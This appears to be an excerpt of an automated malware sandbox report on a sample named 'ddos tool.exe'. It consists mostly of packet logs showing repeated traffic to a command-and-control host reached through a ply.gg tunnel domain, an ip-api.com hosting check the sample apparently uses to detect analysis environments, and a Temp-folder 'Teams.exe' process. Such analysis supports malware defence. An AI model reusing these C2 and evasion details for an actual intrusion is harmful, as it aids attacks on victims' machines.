                                                          Jan 3, 2025 22:21:21.077713966 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.100100994 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.104871035 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.150403023 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.155345917 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155415058 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155432940 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155539036 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155546904 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155601978 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155684948 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155700922 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155759096 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155792952 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155862093 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.155877113 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.209764004 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.214668989 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.318696976 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.456974030 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.457027912 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.462161064 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.512507915 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.538561106 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.543320894 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.602803946 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.607685089 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.607765913 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.607778072 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.607844114 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.607912064 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608062029 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608114958 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608203888 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608211994 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608251095 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608289003 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608346939 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.608377934 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.646846056 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.651724100 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.756330967 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.761156082 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.867711067 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.873264074 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:21.974998951 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:21.980770111 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.084287882 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.089072943 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.112035990 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.162216902 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.168279886 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.173247099 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173285961 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173346043 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173459053 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173466921 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173475027 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173496962 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173588991 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173635960 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173711061 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173748016 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.173855066 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.215886116 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.219434977 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.224256992 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.303128958 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.307931900 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.412965059 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.417778969 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.543040991 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.587407112 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.793922901 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.798793077 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.899189949 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.902107954 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:22.904010057 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.906992912 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907044888 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907160044 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907171965 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907212019 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907219887 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907222986 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907259941 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907341957 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907349110 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907356977 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907363892 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907371998 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907406092 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:22.907588005 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.006284952 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.011059046 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.115411043 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.120347023 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.225064993 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.229928017 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.265079021 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.318487883 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.320664883 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.325716019 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.325822115 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.325830936 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.325884104 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.325957060 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.325964928 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.325993061 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.326040030 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.326057911 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.334310055 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.379901886 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.443686008 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.448481083 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.553107023 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.557981014 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.662528992 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.667327881 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.732456923 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.771934986 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.773200035 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.776750088 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778075933 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778110981 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778158903 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778213978 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778259993 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778316975 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778333902 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778400898 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778419971 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778467894 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778511047 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778559923 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.778573036 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.881333113 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.886161089 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:23.990559101 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:23.995399952 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.099894047 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.104758024 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.209562063 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.214401960 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.318778992 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.323580980 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.327750921 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.367616892 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.372528076 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372575998 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372662067 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372678041 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372720957 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372773886 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372817039 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372837067 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372919083 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.372956038 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.419953108 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.428092957 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.433181047 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.537499905 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.542356014 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.646801949 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.651885986 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.731980085 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.756239891 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.761040926 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.788286924 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.793682098 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.793807983 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.793840885 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.793880939 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794014931 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794022083 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794029951 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794075012 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794099092 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794152021 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794199944 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794256926 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.794272900 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.865711927 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.870537043 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:24.975059986 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:24.979895115 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.084454060 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.089293003 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.153800011 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.194972992 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.199875116 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.208818913 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.214107037 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.303035021 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.307867050 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.412400961 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.417222977 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.521747112 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.526774883 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.626115084 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.631418943 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.636264086 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.663819075 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.668857098 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.668967009 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.668977976 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.668988943 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.740506887 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.745286942 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.849915981 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.854743004 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:25.959299088 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:25.964170933 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.063252926 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.068790913 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.074050903 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.098198891 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.103038073 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103080034 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103126049 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103198051 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103251934 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103385925 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103393078 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103400946 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103427887 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103477001 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103518009 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103610039 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.103617907 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.178065062 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.182897091 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.289849043 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.294670105 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.396797895 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.401638031 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.487795115 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.506294012 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.511209011 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.535665989 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.540647030 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.540788889 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.540828943 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.540960073 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.540978909 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.540992975 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541004896 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541074038 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541085958 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541096926 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541188002 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541199923 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.541212082 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.615761995 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.621764898 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.724996090 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.729876041 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.834213018 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.839025974 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.896656990 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.943444014 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.967381954 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.972364902 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972381115 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972431898 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:26.972462893 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972486019 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972507000 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972583055 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972637892 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972661972 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972762108 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972774029 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.972820044 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:26.977251053 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.084193945 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.089040041 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.193573952 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.198466063 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.302944899 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.307816029 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.376573086 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.412425041 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.417349100 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.426237106 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.431147099 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431370974 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431457043 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431468964 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431483984 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431539059 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431586981 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.431647062 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.521689892 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.526537895 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.553340912 CET5701249941147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.556235075 CET4994157012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.561237097 CET5701249941147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:27.561305046 CET4994157012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.564831018 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:27.565268040 CET4970480192.168.2.5208.95.112.1

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 3, 2025 22:19:58.011544943 CET6033153192.168.2.51.1.1.1
                                                          Jan 3, 2025 22:19:58.019506931 CET53603311.1.1.1192.168.2.5
                                                          Jan 3, 2025 22:20:54.371659994 CET5219053192.168.2.51.1.1.1
                                                          Jan 3, 2025 22:20:54.405065060 CET53521901.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 3, 2025 22:19:58.011544943 CET192.168.2.51.1.1.10xde56Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                          Jan 3, 2025 22:20:54.371659994 CET192.168.2.51.1.1.10x7f06Standard query (0)responsibility-popular.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 3, 2025 22:19:58.019506931 CET1.1.1.1192.168.2.50xde56No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                          Jan 3, 2025 22:20:54.405065060 CET1.1.1.1192.168.2.50x7f06No error (0)responsibility-popular.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • ip-api.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549704208.95.112.1803172C:\Users\user\AppData\Local\Temp\Teams.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 3, 2025 22:19:58.031385899 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                          Host: ip-api.com
                                                          Connection: Keep-Alive
                                                          Jan 3, 2025 22:19:58.618948936 CET175INHTTP/1.1 200 OK
                                                          Date: Fri, 03 Jan 2025 21:19:57 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 6
                                                          Access-Control-Allow-Origin: *
                                                          X-Ttl: 60
                                                          X-Rl: 44
                                                          Data Raw: 66 61 6c 73 65 0a
                                                          Data Ascii: false


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:16:19:53
                                                          Start date:03/01/2025
                                                          Path:C:\Users\user\Desktop\ddos tool.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\ddos tool.exe"
                                                          Imagebase:0x6a0000
                                                          File size:204'288 bytes
                                                          MD5 hash:A5644DC7298B5BD632F3656816FFF5ED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

